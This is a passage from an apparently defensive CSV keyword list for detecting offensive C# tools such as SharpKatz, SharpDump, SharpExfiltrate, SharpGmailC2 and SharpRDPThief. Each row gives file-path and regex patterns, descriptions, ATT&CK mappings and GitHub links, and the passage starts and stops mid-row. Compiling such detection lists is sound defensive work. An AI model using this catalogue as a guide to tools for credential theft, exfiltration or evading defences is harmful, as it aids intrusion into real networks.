T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpDomainSpraty\*",".{0,1000}\\SharpDomainSpraty\\.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*\SharpDoor.cs*",".{0,1000}\\SharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\SharpDoor.exe*",".{0,1000}\\SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*\SharpDPAPI.exe*",".{0,1000}\\SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpDump.exe*",".{0,1000}\\SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpEDRChecker-*.zip*",".{0,1000}\\SharpEDRChecker\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*\SharpEDRChecker.cs*",".{0,1000}\\SharpEDRChecker\.cs.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*\SharpEDRChecker.exe*",".{0,1000}\\SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpEDRChecker.sln*",".{0,1000}\\SharpEDRChecker\.sln.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*\SharpEDRChecker\*",".{0,1000}\\SharpEDRChecker\\.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*\SharpEfsPotato*",".{0,1000}\\SharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*\SharPersist.exe*",".{0,1000}\\SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharPersist\*",".{0,1000}\\SharPersist\\.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*\SharpExec.exe*",".{0,1000}\\SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpExfiltrate\*",".{0,1000}\\SharpExfiltrate\\.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*\SharpFinder.exe*",".{0,1000}\\SharpFinder\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpGhostTask*",".{0,1000}\\SharpGhostTask.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","0","N/A","10","2","108","13","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z" "*\SharpGmailC2*",".{0,1000}\\SharpGmailC2.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*\SharpGPOAbuse.exe*",".{0,1000}\\SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpHandler.exe*",".{0,1000}\\SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpHose.exe*",".{0,1000}\\SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpHose.exe*",".{0,1000}\\SharpHose\.exe.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "*\SharpHose\Program.cs*",".{0,1000}\\SharpHose\\Program\.cs.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "*\SharpHound.exe*",".{0,1000}\\SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpHound.html*",".{0,1000}\\SharpHound\.html.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*\SharpHoundCommon\*",".{0,1000}\\SharpHoundCommon\\.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*\SharpKatz.exe*",".{0,1000}\\SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Sharp-Killer.sln*",".{0,1000}\\Sharp\-Killer\.sln.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","0","N/A","10","4","338","41","2024-01-25T09:24:57Z","2023-10-21T17:27:59Z" "*\SharpLAPS.exe*",".{0,1000}\\SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpLDAP\*",".{0,1000}\\SharpLDAP\\.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","N/A","N/A","N/A","N/A","N/A" "*\SharpMapExec.exe*",".{0,1000}\\SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpMiniDump.exe*",".{0,1000}\\SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*\SharpMove.exe*",".{0,1000}\\SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpNamedPipePTH.exe*",".{0,1000}\\SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpNoPSExec*",".{0,1000}\\SharpNoPSExec.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","587","88","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*\SharpNoPSExec.exe*",".{0,1000}\\SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpPersistSD.cs*",".{0,1000}\\SharpPersistSD\.cs.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\SharpPersistSD.dll*",".{0,1000}\\SharpPersistSD\.dll.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\SharpPersistSD.sln*",".{0,1000}\\SharpPersistSD\.sln.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*\SharpPrinter.exe*",".{0,1000}\\SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\sharprdp.exe*",".{0,1000}\\sharprdp\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\SharpRDP.exe*",".{0,1000}\\SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpRDP\*",".{0,1000}\\SharpRDP\\.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*\SharpRDPHijack*",".{0,1000}\\SharpRDPHijack.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","5","407","71","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" "*\SharpRDPThief\*",".{0,1000}\\SharpRDPThief\\.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "*\SharpReg.exe*",".{0,1000}\\SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpRoast.exe*",".{0,1000}\\SharpRoast\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\SharpRoast.json*",".{0,1000}\\SharpRoast\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\SharpSCCM.exe*",".{0,1000}\\SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpSearch.exe*",".{0,1000}\\SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation 